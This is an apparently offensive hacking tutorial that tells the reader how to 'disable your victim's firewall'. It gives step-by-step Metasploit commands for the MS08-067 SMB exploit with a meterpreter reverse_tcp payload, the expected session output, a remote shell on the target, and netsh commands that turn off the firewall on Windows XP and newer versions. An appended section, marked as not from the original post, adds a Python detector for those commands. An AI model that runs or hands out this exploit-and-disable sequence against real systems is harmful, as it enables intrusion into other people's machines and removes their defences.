NetSH

Follow these steps to disable your victim’s firewall.

#1) Open terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside msf console type*
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms_08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
*The output will be: PAYLOAD => windows/meterpreter/reverse_tcp*

*Now, set the local host – the hacker’s local IP address*
msf exploit (ms_08_067_netapi) > set LHOST 192.168.50.15
*The output will be: LHOST => 192.168.50.15*

*Now, set the remote host – the target’s local IP address*
msf exploit (ms_08_067_netapi) > set RHOST 192.168.50.7
*The output will be: RHOST => 192.168.50.7*

*Now, Set The LPORT & RPORT*
msf exploit (ms_08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit (ms_08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit (ms_08_067_netapi) > show options
*Here we will get the whole details about our exploit process*

Now, let’s make it work. Let’s type:
msf exploit (ms_08_067_netapi) > exploit

*And you will get this output*
[*] Started reverse handler on 192.168.50.15:4444
[*] Automatically detecting the target…
[*] Fingerprinting: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability …
[*] Sending stage (885806 bytes) to 192.168.50.7
[*] Meterpreter session 1 opened (192.168.50.15:4444 -> 192.168.50.7:1045) at 2015-10-11 14:20:19 +0300

meterpreter >

*Type:*
meterpreter > shell
*You will get this output*
Process 768 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

*Now follow along & type these commands one by one*
C:\WINDOWS\system32>netsh firewall show opmode
*You should get this output*
netsh firewall show opmode

Domain profile configuration:
——————————————————————————————–
Operational mode                                            = Enable
Exception mode                                                = Enable

Standard profile configuration (current):
——————————————————————————————–
Operational mode                                            = Enable
Exception mode                                                = Enable

Local Area Connection firewall configuration:
——————————————————————————————–
Operational mode                                            = Enable

 

*Type 1 by 1*
C:\WINDOWS\system32>netsh firewall set opmode mode=DISABLE
C:\WINDOWS\system32>netsh firewall show opmode
*You should get this output*

Domain profile configuration:
——————————————————————————————–
Operational mode                                          = Enable
Exception mode                                              = Enable

Standard profile configuration (current):
——————————————————————————————–
Operational mode                                           = Disable
Exception mode                                               = Enable

Local Area Connection firewall configuration:
——————————————————————————————–

C:\WINDOWS\system32>

*As you can see, the Operational mode is now Disable, which means the firewall is OFF*

 

[NOTICE]
*In Windows 7, 8.1 & 10 the output is a bit different; here is an example from Win 8.1*
The command in Win 7, 8.1 & 10 is:
C:\WINDOWS\system32>netsh advfirewall set allprofiles state off

Domain profile configuration:
——————————————————————-
Operational mode                               = Enable
Exception mode                                   = Enable

Standard profile configuration (current):
——————————————————————-
Operational mode                               = Disable
Exception mode                                   = Enable

IMPORTANT: Command executed successfully.
However, “netsh firewall” is deprecated;
use “netsh advfirewall firewall” instead.
For more information on using “netsh advfirewall firewall” commands
instead of “netsh firewall”, see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488

C:\WINDOWS\system32>
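
Added example (not part of the original post): a Python sketch for the defending side that flags the two netsh firewall-disable commands shown above in process-creation command lines (such as those recorded by Security event 4688 or Sysmon event 1) and reads `netsh firewall show opmode` output for disabled profiles. The rule names, function names and sample events are constructed for illustration.

```python
import re

# Legacy (XP/2003): netsh firewall set opmode [mode=]disable
# Vista and later:  netsh advfirewall set <profile> state off
DISABLE_PATTERNS = [
    ("legacy-opmode-disable", re.compile(
        r'\bnetsh(?:\.exe)?"?\s+firewall\s+set\s+opmode\s+(?:mode\s*=\s*)?disable\b', re.I)),
    ("advfirewall-state-off", re.compile(
        r'\bnetsh(?:\.exe)?"?\s+advfirewall\s+set\s+(?:all|current|domain|private|public)'
        r'profiles?\s+state\s+off\b', re.I)),
]

def classify_command(cmdline):
    """Return the name of the rule a process command line matches, or None."""
    normalized = " ".join(cmdline.split())  # collapse runs of whitespace
    for name, pattern in DISABLE_PATTERNS:
        if pattern.search(normalized):
            return name
    return None

def disabled_profiles(show_opmode_output):
    """Parse `netsh firewall show opmode` text; list profiles reported as Disable."""
    disabled, current = [], None
    for line in map(str.strip, show_opmode_output.splitlines()):
        header = re.match(r"(.+?) (?:profile|firewall) configuration(?: \(current\))?:$", line)
        if header:
            current = header.group(1)
        elif current and re.match(r"Operational mode\s*=\s*Disable$", line, re.I):
            disabled.append(current)
    return disabled

# Constructed sample events (parent image, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("explorer.exe", "netsh firewall show opmode"),
    ("cmd.exe", "netsh  firewall set opmode mode=DISABLE"),
    ("cmd.exe", r"C:\Windows\System32\netsh.exe advfirewall set allprofiles state off"),
    ("mmc.exe", "netsh advfirewall set allprofiles state on"),
]

def alerts(events):
    """Return (parent, rule, cmdline) for each event that turns the firewall off."""
    hits = ((p, classify_command(c), c) for p, c in events)
    return [h for h in hits if h[1]]

if __name__ == "__main__":
    for parent, rule, cmd in alerts(SAMPLE_EVENTS):
        print(f"ALERT {rule}: parent={parent} cmd={cmd}")
```

Read-only queries and `state on` do not match; only the disabling forms raise an alert.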

 

ENJOY! 🙂

 

Here is an example by Gamer Forever